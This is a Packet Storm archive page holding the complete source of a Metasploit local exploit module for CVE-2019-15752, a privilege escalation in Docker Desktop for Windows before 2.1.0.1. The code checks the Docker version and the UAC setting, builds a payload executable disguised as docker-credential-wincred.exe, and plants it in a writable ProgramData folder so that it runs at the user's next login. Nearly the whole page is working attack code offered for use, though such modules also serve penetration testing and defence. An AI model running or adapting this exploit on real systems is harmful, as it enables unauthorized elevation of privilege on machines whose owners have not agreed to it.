what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Docker-Credential-Wincred.exe Privilege Escalation

Docker-Credential-Wincred.exe Privilege Escalation
Posted Apr 27, 2020
Authored by bwatters-r7, Morgan Roman | Site metasploit.com

This Metasploit module exploit leverages a vulnerability in Docker Desktop Community Edition versions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login.

tags | exploit
advisories | CVE-2019-15752
SHA-256 | eaa66458a1be58495d72ac8518ba2b5c7ce4adda66caa2a735da2834489bbc19

Docker-Credential-Wincred.exe Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
'Description' => %q{
This exploit leverages a vulnerability in docker desktop
community editions prior to 2.1.0.1 where an attacker can write
a payload to a lower-privileged area to be executed
automatically by the docker user at login.
},
'License' => MSF_LICENSE,
'Author' => [
'Morgan Roman', # discovery
'bwatters-r7', # metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 15
},
'DisclosureDate' => '2019-07-05',
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'References' => [
['CVE', '2019-15752'],
['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
]
)
)
register_options(
[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
)
end

def docker_version
output = cmd_exec('cmd.exe', '/c docker -v')
vprint_status(output)
version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
end

def check
if docker_version <= Gem::Version.new('18.09.0')
return CheckCode::Appears
end

CheckCode::Safe
end

def exploit
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end

# make payload
docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
payload_name = 'docker-credential-wincred.exe'
payload_pathname = "#{docker_path}\\#{payload_name}"
vprint_status('Making Payload')
payload = generate_payload_exe

# upload Payload
vprint_status("Uploading Payload to #{payload_pathname}")
write_file(payload_pathname, payload)
vprint_status('Payload Upload Complete')
print_status('Waiting for user to attempt to login')
end

def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close